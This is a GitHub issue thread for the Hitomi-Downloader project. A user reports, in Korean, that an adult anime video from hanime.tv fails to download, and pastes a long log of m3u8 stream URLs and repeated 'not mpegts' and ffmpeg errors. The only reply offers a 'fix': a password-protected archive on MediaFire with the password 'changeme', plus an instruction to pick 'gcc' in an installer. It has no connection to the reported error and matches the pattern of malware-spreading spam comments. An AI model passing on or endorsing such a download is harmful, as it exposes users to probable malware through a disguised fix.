### ISSUE TITLE
hanime 다운이 안됩니다

### ISSUE THREAD

**Issue by throwawayacc12321** [KurtBestor/Hitomi-Downloader#7451]
링크 올리면 
reading
recording
까지 가고 바로 노란색 에러

뭐가 문젠지 모르겠네요 

[Antechinus] Ajisai no Chiru Koro ni 1

version: 4.1+ (24-08-10 17:02:13 UTC)
platform / locale: Windows-10-10.0.19045-SP0 / en_us
order / group / uid: -152 / False / 3a8de775badd4ce4a918b71deb6b1bae
input: https://hanime.tv/videos/hentai/ajisai-no-chiru-koro-ni-1
type: hanime
single: True
url: https://hanime.tv/videos/hentai/ajisai-no-chiru-koro-ni-1
dir: C:\Users\\Downloads\hitom_hani
zip: 
artist: None
valid / done: False / True
range / range_p: None / None
time: 1724705498.6357388 (24-08-26 20:51:38 UTC) - 9s elapsed
tags: []
lock: False
color: invalid_done
paused: False
format: None
p2f: None
segment: None
admin: True
res: 720
goodbyedpi: True
ytdl: yt_dlp 2024.08.06
pinned: False
extras: {}
live: True
changed: True

[File Names]
[0001] C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4

[URLs]
[0001] M3u8_stream(https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8)

[Messages]
['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
['m3u8', 480, 72, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/r7t893hydgp10f1j255nA1vpg7Z1w6mnslm5xq1lxzbAs3mb1wsqy.m3u8']
['m3u8', 360, 51, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/dm148w9j8k41rcgcg4A2pr4qxmZA1rqpl4xlr2wswqffq9487y2z1.m3u8']
Final stream:
['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
media: 0
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Err: 0 / 0  (0.00%)
utime Error: \\?\C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
Traceback (most recent call last):
 File "hitomi_downloader", line 506, in run
FileNotFoundError: [WinError 2] The system cannot find the file specified: '\\\\?\\C:\\Users\\\\Downloads\\hitom_hani\\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4'

stop
quality: 75%
-show_streams -print_format json -v error "[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4"
Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

{

}
[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4: No such file or directory
Traceback (most recent call last):
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

Traceback (most recent call last):
 File "utils", line 2026, in finish
 File "ffmpeg", line 876, in get_info
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

valid=False 2: C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
EOT: https://hanime.tv/videos/hentai/ajisai-no-chiru-koro-ni-1  (11.6s)

['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
['m3u8', 480, 72, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/r7t893hydgp10f1j255nA1vpg7Z1w6mnslm5xq1lxzbAs3mb1wsqy.m3u8']
['m3u8', 360, 51, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/dm148w9j8k41rcgcg4A2pr4qxmZA1rqpl4xlr2wswqffq9487y2z1.m3u8']
Final stream:
['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
media: 0
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Err: 0 / 0  (0.00%)
utime Error: \\?\C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
Traceback (most recent call last):
 File "hitomi_downloader", line 506, in run
FileNotFoundError: [WinError 2] The system cannot find the file specified: '\\\\?\\C:\\Users\\\\Downloads\\hitom_hani\\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4'

stop
quality: 75%
-show_streams -print_format json -v error "[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4"
Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

{

}
[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4: No such file or directory
Traceback (most recent call last):
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

Traceback (most recent call last):
 File "utils", line 2026, in finish
 File "ffmpeg", line 876, in get_info
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

valid=False 2: C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
EOT: https://hanime.tv/videos/hentai/ajisai-no-chiru-koro-ni-1  (95.8s)

['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
['m3u8', 480, 72, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/r7t893hydgp10f1j255nA1vpg7Z1w6mnslm5xq1lxzbAs3mb1wsqy.m3u8']
['m3u8', 360, 51, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/dm148w9j8k41rcgcg4A2pr4qxmZA1rqpl4xlr2wswqffq9487y2z1.m3u8']
Final stream:
['m3u8', 720, 144, 'https://m3u8s.highwinds-cdn.com/api/v9/m3u8s/yhr4j8582ql1dqxh2shvxsgvvmZyxr0Arrsp11kkz54hqgjlcn5gq.m3u8']
media: 0
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-03.top/2/7/6/1/v1x/segs/b0/2/KLz2qcNTKRuufsHJJehfOwHA.html' for reading
Opening 'https://eureka-24b-04.top/2/7/6/1/v1x/segs/b0/2/D2LBQauU80fCu84kE1Wb4CyU.html' for reading
Opening 'https://eureka-24b-06.top/2/7/6/1/v1x/segs/b0/2/Bxw0Qbr8mywYco9pExrn82aS.html' for reading
Opening 'https://eureka-24b-05.top/2/7/6/1/v1x/segs/b0/2/8xHx7mhWQQdmtv3Ig3y6inyR.html' for reading
Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Err: 0 / 0  (0.00%)
utime Error: \\?\C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
Traceback (most recent call last):
 File "hitomi_downloader", line 506, in run
FileNotFoundError: [WinError 2] The system cannot find the file specified: '\\\\?\\C:\\Users\\\\Downloads\\hitom_hani\\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4'

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

Traceback (most recent call last):
 File "m3u8_tools", line 61, in run
 File "decorator", line 232, in fun
 File "constants", line 940, in try_
 File "constants", line 909, in try_
 File "m3u8_tools", line 424, in _read
 File "m3u8_tools", line 411, in _read
ValueError: not mpegts

stop
quality: 75%
-show_streams -print_format json -v error "[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4"
{

}
[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4: No such file or directory
Traceback (most recent call last):
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

Traceback (most recent call last):
 File "utils", line 2026, in finish
 File "ffmpeg", line 876, in get_info
 File "ffmpeg", line 873, in get_info
Exception: Failed to convert; exit code: 1

valid=False 2: C:\Users\\Downloads\hitom_hani\[Antechinus] Ajisai no Chiru Koro ni 1 (2761).mp4
EOT: https://hanime.tv/videos/hentai/ajisai-no-chiru-koro-ni-1  (7.9s)

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
